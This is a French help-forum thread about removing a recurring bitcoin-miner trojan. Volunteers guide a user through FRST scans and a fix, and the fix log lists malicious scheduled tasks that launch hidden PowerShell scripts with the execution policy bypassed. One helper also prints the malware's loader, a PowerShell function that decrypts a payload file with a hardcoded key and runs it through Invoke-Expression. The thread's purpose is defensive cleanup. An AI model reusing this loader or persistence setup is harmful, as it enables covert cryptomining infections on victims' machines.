Virus Trojan miner de bitcoin qui reviens sans cesse

[zans25l]

Bonjour,


Il y a quelques temps j'avais constaté un ralentissement de mon PC très fort, même sur internet les vidéos Youtube étaient saccadés.

J'ai pensé à un virus bien que cela me paraissait bizarre (faisant globalement assez attention à ce que je fais sur l'ordi) et effectivement, Malwarebytes Anti-Malware (MBAM) m'a détecté 6 virus trojan mineur de bitcoin:

BitcoinMiner-Trojan-Miner.jpg

J'ai donc mis tout ça en quarantaine, puis supprimé de la quarantaine. Puis j'ai fais une analyse avec Avast gratuit qui n'a rien trouvé d'autres.

Ca marche bien, mon PC retrouve toute sa puissance mais je ne sais pas comment, alors que je ne fais rien de spécial, ils reviennent quelques temps après: exactement les 6 même virus mineurs de bitcoin.

Je ne connais pas bien la sécurité informatique alors voilà pourquoi votre aide serait vraiment très précieuse.

D'avance, merci


PS: Windows Defender n'a jamais rien trouvé. C'est bizarre, il me semblait plutôt fiable.

[Malekal_morte]

Salut,

Suis le tutoriel FRST. ( prends le temps de lire attentivement - tout y est bien expliqué ).

Attendre la fin du scan, un message indique que l'analyse est terminée.
Télécharge et lance le scan FRST,

Trois rapports FRST seront générés :
* FRST.txt
* Shortcut
* Additionnal.txt

Envoie ces 3 rapports sur le site https://pjjoint.malekal.com/ et en retour donne les 3 liens pjjoint qui mènent aux rapports ici dans une nouvelle réponse afin que l'on puisse les consulter.

(Les liens bleus mènent à des tutoriels explicatifs pas à pas, clic dessus pour avoir les instructions plus précises à suivre).

[zans25l]

Merci pour la réponse rapide.

Voilà les rapports:

https://pjjoint.malekal.com/files.php?i ... x5s15l6g13

https://pjjoint.malekal.com/files.php?i ... c7y12e6m15

Mais le shortcuts n'a pas été généré, je ne comprends pas...

[Malekal_morte]

Désinstalle App Explorer

Vas dans le dossier Windows
Tu dois avoir un fichier core.ps1
Faire un clic droit dessus > envoyer vers > fichier compresser
Déplace le fichier ZIP
Même chose pour C:\Users\33631\AppData\Roaming\Winsoft\core.ps1

Dans une réponse ici, vas dans en bas dans l'éditeur avancé et attache les fichiers ZIP.
Si tu ne vois pas le fichier; affiche les fichiers cachés : Comment afficher les fichiers cachés sur Windows 11

[zans25l]

Merci.

Je n'arrive pas à joindre les fichiers Zip, cela me met erreur HTTP.

Comment faire svp ?

[Malekal_morte]

Tente de le mettre sur https://pjjoint.malekal.com et donner le lien ici.

[angelique]

Salut,

Pour envoyer tes zip, utilise https://uploadnow.io/fr et donne les liens.

[zans25l]

Salut, merci pour vos réponses. Voilà les liens:

Core1:
https://pjjoint.malekal.com/files.php?i ... m9m13d7p10

Core2:
https://pjjoint.malekal.com/files.php?i ... 14t13h10h8

[angelique]

Bonjour/Bonsoir





Télécharge à coté de FRST64.EXE , PAS AILLEURS !!!!! le fichier fixlist.txt en pièce jointe en bas du message.

➯ Relance FRST64(clic droit exécuter en tant qu'administrateur) et clic sur le bouton corriger/fix
Un redémarrage peut être nécessaire (pas obligatoire).
Un fichier texte apparaît peut être nommé fixlog.txt au même endroit que frst64.exe et que fixlist.txt, copie/colle le contenu ici dans un nouveau message avec ton commentaire.

/!\ Ce script a été établi pour cet utilisateur, il ne doit, en aucun cas, être appliqué sur un autre système, au risque de provoquer de graves dysfonctionnements et endommager Windows /!\

[zans25l]

Bonsoir,

Voilà c'est fait:

Résultats de correction de Farbar Recovery Scan Tool (x64) Version: 20-01-2023
Exécuté par 33631 (20-01-2023 16:19:29) Run:1
Exécuté depuis C:\Users\33631\Downloads
Profils chargés: 33631 & Administrateur
Mode d'amorçage: Normal
==============================================

fixlist contenu:
*****************
CreateRestorePoint:
Task: {72EBD714-C7A2-4830-9A53-A82303B0B9EF} - System32\Tasks\ViGEmBusUpdater1 => "powershell" -ExecutionPolicy Bypass C:\WINDOWS\core.ps1
Task: {D40589A4-6FEB-4114-9506-8BE63E927DD6} - System32\Tasks\MSI Task Host - Detect_Monitor => "powershell" -ExecutionPolicy ByPass -WindowStyle Hidden C:\Users\33631\AppData\Roaming\Winsoft\core.ps1
C:\Users\33631\AppData\Roaming\Winsoft
CMD: "%WINDIR%\SYSTEM32\lodctr.exe" /R
CMD: "%WINDIR%\SysWOW64\lodctr.exe" /R
CMD: "C:\Windows\SysWOW64\lodctr.exe" /R
CMD: "C:\Windows\SYSTEM32\lodctr.exe" /R
EmptyTemp:


*****************

Le Point de restauration a été créé avec succès.
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{72EBD714-C7A2-4830-9A53-A82303B0B9EF}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{72EBD714-C7A2-4830-9A53-A82303B0B9EF}" => supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\ViGEmBusUpdater1 => déplacé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ViGEmBusUpdater1" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{D40589A4-6FEB-4114-9506-8BE63E927DD6}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{D40589A4-6FEB-4114-9506-8BE63E927DD6}" => supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\MSI Task Host - Detect_Monitor => déplacé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\MSI Task Host - Detect_Monitor" => supprimé(es) avec succès
C:\Users\33631\AppData\Roaming\Winsoft => déplacé(es) avec succès

========= "%WINDIR%\SYSTEM32\lodctr.exe" /R =========


Infosÿ: Reconstruction du paramŠtre de compteur de performance r‚ussie … partir du magasin de stockage systŠme
========= Fin de CMD: =========


========= "%WINDIR%\SysWOW64\lodctr.exe" /R =========


Infosÿ: Reconstruction du paramŠtre de compteur de performance r‚ussie … partir du magasin de stockage systŠme
========= Fin de CMD: =========


========= "C:\Windows\SysWOW64\lodctr.exe" /R =========


Infosÿ: Reconstruction du paramŠtre de compteur de performance r‚ussie … partir du magasin de stockage systŠme
========= Fin de CMD: =========


========= "C:\Windows\SYSTEM32\lodctr.exe" /R =========


Infosÿ: Reconstruction du paramŠtre de compteur de performance r‚ussie … partir du magasin de stockage systŠme
========= Fin de CMD: =========


=========== EmptyTemp: ==========

FlushDNS => terminé(e)
BITS transfer queue => 1572864 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 49929373 B
Java, Discord, Steam htmlcache, WinHttpAutoProxySvc/winhttp *.cache => 1280332517 B
Windows/system/drivers => 97489012 B
Edge => 0 B
Chrome => 60509729 B
Firefox => 1158057134 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Default => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 0 B
systemprofile32 => 40606 B
LocalService => 75862 B
NetworkService => 136842 B
33631 => 123506403 B
Administrateur => 123519507 B

RecycleBin => 0 B
EmptyTemp: => 2.7 GB données temporaires supprimées.

================================


Le système a dû redémarrer.

==== Fin de Fixlog 16:20:21 ====

[angelique]

Le miner ne devrait plus revenir.

supprime aussi C:\WINDOWS\core.ps1

[zans25l]

Super, merci beaucoup pour l'aide. C'est vraiment sympa .

Sinon est ce qu'on sait d'ou viens le mineur ? Histoire de ne pas refaire la même erreur ^^

[angelique]

ça l'air d'un powershell encrypted,

Code : Tout sélectionner

function Execute-EncryptedScript($path) {
  trap { Write-Host -fore Red "You are not authorized to decrypt and execute this script"; continue }
  & {
    $raw = Get-Content $path
    $key = (convertto-securestring -string "LYgn6zkMEvMxp0cM" -asplaintext -force)
    $helper = New-Object system.Management.Automation.PSCredential("test", $key)
    $key = $helper.GetNetworkCredential().Password
    $secure = ConvertTo-SecureString $raw -key (([int[]][char[]]$key)[0..15]) -ea Stop
    $helper = New-Object system.Management.Automation.PSCredential("test", $secure)
    $plain = $helper.GetNetworkCredential().Password
    Invoke-Expression $plain
  }
}

Execute-EncryptedScript $env:appdata\Winsoft\core.bin

donc je sais pas.

Suppression de FRST

Pour supprimer automatiquement tous les fichiers/dossiers créés par FRST et l'outil lui-même, renommez FRST/FRST64.exe en uninstall.exe et exécutez-le. La procédure nécessite un redémarrage

[zans25l]

Ok merci .

[Parisien_entraide]

Bonsoir

Je note un Adobe Photoshop CC 2019.. Adobe Premiere Pro CC 2019 (je n'ai pas regardé le reste, comme les autres programmes et les jeux mais c'est suffisant) vu les versions c'est cracké donc il ne faut pas s'étonner d'attraper des malwares

Un truc aussi qui traine "Sweetlabs".. Cela me rappelait quelque chose et en fait c'était en relation avec Open Candy (malware) mais je ne sais ce qu'il en est actuellement

Edit : En plus le host est rempli de www.fitgirlrepacks donc pas la peine de chercher la source de tes problèmes